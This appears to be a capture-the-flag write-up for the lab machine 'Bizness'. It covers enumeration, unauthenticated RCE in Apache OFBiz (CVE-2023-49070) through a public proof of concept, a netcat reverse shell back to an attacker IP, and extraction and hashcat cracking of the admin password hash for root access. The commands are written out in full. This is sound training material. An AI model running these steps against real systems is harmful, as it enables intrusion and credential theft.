Enumeration

First, let's identify all the running services. We can do a quick nmap scan:

nmap bizness.htb 

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Looks like we have a webserver, so let's run feroxbuster to try and find some interesting files or directories:

feroxbuster --url https://bizness.htb -k

One of the results is the /ap endpoint, which is running Apache Ofbiz v18.12. A quick Google search finds CVE-2023-49070, which allows for unauthenticated RCE!

Exploitation

Let's start a reverse shell listener using ncat:

nc -lvnp 8888

And then we can use the PoC exploit (https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass):

python3 exploit.py --url https://bizness.htb --cmd 'nc -c /bin/bash 10.10.14.183 8888'

And now we have a simple shell. The next step is to upgrade it to a TTY shell so we can get better control.

python3 -c 'import pty; pty.spawn("/bin/bash")'
[CTRL+Z]
stty raw -echo && fg
export SHELL=/bin/bash; export TERM=screen; reset;

Privilege Escalation

OfBiz uses the default credentials of admin:ofbiz, but from initial testing on the website, the admin account has been changed. It's probable that whatever password admin has been set to is the same for root (typical scenario of password reuse), so let's try to find where passwords are stored in OfBiz.

I started with running "grep -r "password" /opt/ofbiz" and found that passwords are stored in XML as follows:

userLoginId="" 
currentPassword="{SHA}..."

Thus, we can do:

grep -r "userLoginId=\"admin\"" /opt/ofbiz

There's a few entries, ie 47b56994cbc2b6d10aa1be30f70165adb305a41a, but Crackstation.net reveals it has ofbiz, which we know isn't right. However, there is an interesting match:

grep: ./runtime/data/derby/ofbiz/seg0/c54d0.dat: binary file matches

We can add -a to our grep command to show binary matches:

grep -ra "userLoginId=\"admin\"" /opt/ofbiz

./runtime/data/derby/ofbiz/seg0/c54d0.dat:                <eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>

Now we have an interesting match that contains a salted SHA hash. Essentially, we have $mode$salt$hash, and we can convert this to a format that John or Hashcat supports. We need to go from Base64url -> Base64 -> Hex

Looking at the https://hashcat.net/wiki/doku.php?id=example_hashes we can use mode 110 or 120 for salted SHA. All-in-all, our Hashcat command will be:

echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > ofbiz_hash
hashcat -a 0 -m 120 ofbiz_hash /usr/share/wordlists/rockyou.txt

We have now cracked the password, and can try it with root

su root
cd /root
cat root.xt